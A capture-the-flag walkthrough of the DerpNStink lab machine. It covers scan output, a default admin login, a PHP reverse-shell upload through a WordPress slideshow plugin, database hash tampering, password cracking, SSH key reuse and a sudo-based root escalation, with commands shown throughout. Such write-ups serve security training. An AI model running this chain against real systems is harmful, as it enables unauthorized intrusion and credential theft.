# DerpNStink ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/DNS 192.168.1.116 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT Nmap scan report for 192.168.1.116 Host is up (0.0017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA) | 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA) | 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA) |_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |_/php/ /temporary/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: DeRPnStiNK MAC Address: 00:0C:29:7D:91:B5 (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds ``` Let's put the IP to the web browser ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-Tc63uSURbQHHd-d%2Fimage.png?alt=media\&token=bc5ad2cd-fff4-4784-9cec-146f563cc99c) If we go to inspect element and open up all div we can get the first flag ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AtBYTz53KeFg07TxL%2Fimage.png?alt=media\&token=2b68db0f-d8b1-4b80-8725-6a9b4ff3b3b6) ### Dirb ``` dirb http://192.168.1.116/ ``` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 25 04:50:28 2020 URL_BASE: http://192.168.1.116/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.116/ ---- ==> DIRECTORY: http://192.168.1.116/css/ + http://192.168.1.116/index.html (CODE:200|SIZE:1298) ==> DIRECTORY: http://192.168.1.116/javascript/ ==> DIRECTORY: http://192.168.1.116/js/ ==> DIRECTORY: http://192.168.1.116/php/ + http://192.168.1.116/robots.txt (CODE:200|SIZE:53) + http://192.168.1.116/server-status (CODE:403|SIZE:293) ==> DIRECTORY: http://192.168.1.116/temporary/ ==> DIRECTORY: http://192.168.1.116/weblog/ ``` We can see at the nmap and dirb scan has `robots.txt`, lets navigate to there ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-bpmu9adbWHI9tns%2Fimage.png?alt=media\&token=7b12567f-b4f5-422b-978e-8245b9acf906) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-nADQayOSMWBS1eW%2Fimage.png?alt=media\&token=1d823e17-5549-4966-b366-7a014a26311b) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A-peND3WV5ba3bMAv%2Fimage.png?alt=media\&token=23873266-259f-4830-b057-7d8e3f59c2e3) As we can see, we don't have permission on `/php` and `/temporary` told us to try harder. We also can see a `/weblog` in the dirb scan. After navigating to there I got an error ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A0wAF-4zNWFAzVWLH%2Fimage.png?alt=media\&token=2b5c0866-1df8-4f78-8d66-3cac92fbddb6) I navigate to /etc/hosts and add a IP at there ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A18I_PPouJrFRtDs3%2Fimage.png?alt=media\&token=1b959e4c-69d4-4441-9d78-a429d9cabb67) After that refresh the page and we can see a WordPress Blog ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A1IkPjz5VfQNw2zkx%2Fimage.png?alt=media\&token=b2ba940d-9875-4bcb-9da6-32a33a4e2647) ### Wpscan ``` wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive ``` ``` _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://derpnstink.local/weblog/ [192.168.1.116] [+] Started: Mon May 25 04:55:03 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.7 (Ubuntu) | - X-Powered-By: PHP/5.5.9-1ubuntu4.22 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://derpnstink.local/weblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29). | Found By: Emoji Settings (Passive Detection) | - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18' | Confirmed By: Meta Generator (Passive Detection) | - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18' [+] WordPress theme in use: twentysixteen | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 2.1 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18 | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3' [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] akismet | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/ | Last Updated: 2020-04-29T13:02:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 4.1.5 | | Found By: Known Locations (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200 | | Version: 3.1.11 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt [+] slideshow-gallery | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/ | Last Updated: 2019-07-12T13:09:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt | [!] The version is out of date, the latest version is 1.6.12 | | Found By: Known Locations (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403 | | Version: 1.4.6 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] unclestinky | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Mon May 25 04:57:36 2020 [+] Requests Done: 86966 [+] Cached Requests: 12 [+] Data Sent: 22.571 MB [+] Data Received: 11.789 MB [+] Memory used: 368.992 MB [+] Elapsed time: 00:02:33 ``` We got 2 plugins and 2 usernames, for the first try, I managed to log in using the username `admin` and password `admin` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A48-VH770y56yuUtw%2Fimage.png?alt=media\&token=a300f48c-6c91-4a77-aaa1-5ea41c9eecef) After clicking around, I found out that under manage slides we can edit the slideshow and bottom we can see that we can upload image. So, I decided to upload a shell file. ## Exploitation ### Reverse Shell Go to this page and download the php reverse shell file from [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A8rQguug1Beb06XHW%2Fimage.png?alt=media\&token=7eeefe5c-78c4-4617-942a-7e445ab25349) Change the IP and the port to our machine then we need to set up a listener ``` nc -nlvp 4444 ``` Then we can go to `Manage Slides` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9BFotlq6wQ7zAU_A%2Fimage.png?alt=media\&token=7fed1164-7c32-4d27-b1a9-e377b40ff2ad) And I click `randonx` to edit ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9GfV72ePZW9NqC1y%2Fimage.png?alt=media\&token=5ef68f08-a64c-4d82-94a6-23b8a0e314ee) Scroll to the bottom we can see this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9MKJOVlMMww74vgD%2Fimage.png?alt=media\&token=4ff7654e-d9ae-403a-85f4-4233a71c65d9) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9OdyfjxVHE77aUZU%2Fimage.png?alt=media\&token=cbfb2a28-d92c-4bf5-b859-b11649c94403) Upload the reverse shell file. Then go back to the `/weblog` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9XpPMpqKsYgBNXR2%2Fimage.png?alt=media\&token=db0f948c-3aec-4800-a6e3-cab691117b52) Click the right arrow on the slides until you get a reverse shell! ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8A9hmK2YT5edTOYzmV%2Fimage.png?alt=media\&token=48c138b5-21c2-4491-9dfb-915913e7f9aa) And then we can type ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M89zp49RTVs4ocZdoLl%2F-M8AB65F6nW4te-tQBf4%2Fimage.png?alt=media\&token=c3bd1d20-cfb3-4b8c-8eaf-b699cdc8ace1) When I run `linpeas.sh`, I found mysql username and password. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXPhE_-0Y-RIAMuop%2Fimage.png?alt=media\&token=7f00c815-d7c0-44c2-bc6d-abff7270f66b) Then we can go `/php/myphpadmin` to log into the MySQL database Then go to wordpress database and go to `wp_users` I found out that the hash is too difficult to crack because of hash, make it easy, I copy the admin hash to replace the `unclestinky` hash ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXoO5GHipji0WjZa2%2Fimage.png?alt=media\&token=05c4185e-5e90-4e46-99d8-ab8799baef0e) Then we can login into the wordpress again Go to the post, and we will find the second flag. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AXxltNJ2zqarz_9GQ%2Fimage.png?alt=media\&token=28a323d0-40d6-4dc2-97b9-4d8807d115d5) We then go back to the database and go to `mysql` database and go to `user` table. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_KCYqMNmJ9eG0_U6%2Fimage.png?alt=media\&token=2561a5f5-d43d-44e8-bbb2-a803d1974df7) Then we can take unclestinky password to crack it at [here](https://crackstation.net/) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_FZV7tIsr_ApCvok%2Fimage.png?alt=media\&token=aa21e4d8-23fa-48cb-84ec-691ab11dbf6c) We got the password `wedgie57` We then can ssh to the user **stinky** ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8A_l_8LWEbsg6b1-Bl%2Fimage.png?alt=media\&token=6b20ae8c-e099-4f89-8e7c-d7c068f38b52) Then I went to the Desktop folder and I found the third flag! ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AcAXRKFje0jBKokrS%2Fimage.png?alt=media\&token=61572e8d-80f4-43b4-b06e-b9ccb8d1e725) After that, I went to the `/home` directory, I found out 1 ftp folder ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaD31-qV51hM0-d0h%2Fimage.png?alt=media\&token=6c39b25d-e300-40c2-b851-3f695761222a) Then, there is a bunch of ssh files inside over each other ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaGHia-QN2AHLXWzE%2Fimage.png?alt=media\&token=8946e42e-7e54-48ab-a9d6-690a7377efa3) After 7 times of changing directory, we got `key.txt` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaPr59JfMLStF9RaF%2Fimage.png?alt=media\&token=c59ffd73-af15-4f60-9452-6c54f23e9db9) It contains RSA private key ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AQjyO27zb_kk4tOHm%2F-M8AaS-q0S10JqMiR6-D%2Fimage.png?alt=media\&token=b414ec7f-9b1c-4396-92bc-a6a2ea82abf5) This might a clue on ssh to the user stinky We save the RSA txt to a file called `id_rsa` and put it at `/root/.ssh` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AegPqDUo-EXzDGFtP%2Fimage.png?alt=media\&token=1070bfaa-65ee-49b1-9d27-d3aa64361983) We can see that the id\_rsa is too open so we need to change the permission type `chmod 700 id_rsa` Then we can ssh into it ``` ssh -i /root/.ssh/id_rsa stinky@192.168.1.116 ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Af1enPMmbax61wP6i%2Fimage.png?alt=media\&token=3a95e7b9-0d5f-4444-8176-bd1866adc47e) Then navigate to `/home/Stinky/Documents` we can get a pcap file ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Agsv7hUdUAHL5rg5M%2Fimage.png?alt=media\&token=e580ac7c-fd91-46cb-ac95-ca376728c5aa) Transfer it using `nc` to our machine Then analyse the file using `wireshark` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AoEfeiNID2L6wbgBn%2Fimage.png?alt=media\&token=f1979dda-4ccb-44bc-9de9-6ff4204fccc5) Then we can follow the TCP stream and this is the password for user mrderp. we then `su` to user `mrderp` Then type `sudo -l` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8Ao_sU7JxhftpVv51D%2Fimage.png?alt=media\&token=9ea1a460-3c92-47cd-8fa9-fba7188591fd) ## Privilege Escalation We can see that inside the /home/mrderp we don't have the folder called `binaries`. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8ArfqLy3Y8T_WE-Z1O%2Fimage.png?alt=media\&token=ad67e205-26be-4430-8999-92bdf178e661) So we need to create one ``` mkdir binaries cd binaries echo "/bin/bash" > derpy.sh chmod 777 derpy.sh sudo /home/mrderp/derpy* ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AseND0DJfb0blwC8T%2Fimage.png?alt=media\&token=1d551221-b0b9-4145-88c3-56afd77410c6) Got root ! Navigate to the `/root/Desktop` to get the fourth flag ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M8AdfGVqRZbZaDSyznq%2F-M8AslmYWD48UKj9q8ql%2Fimage.png?alt=media\&token=d70832dc-7adb-4dbf-aa0c-250c0ad94e97)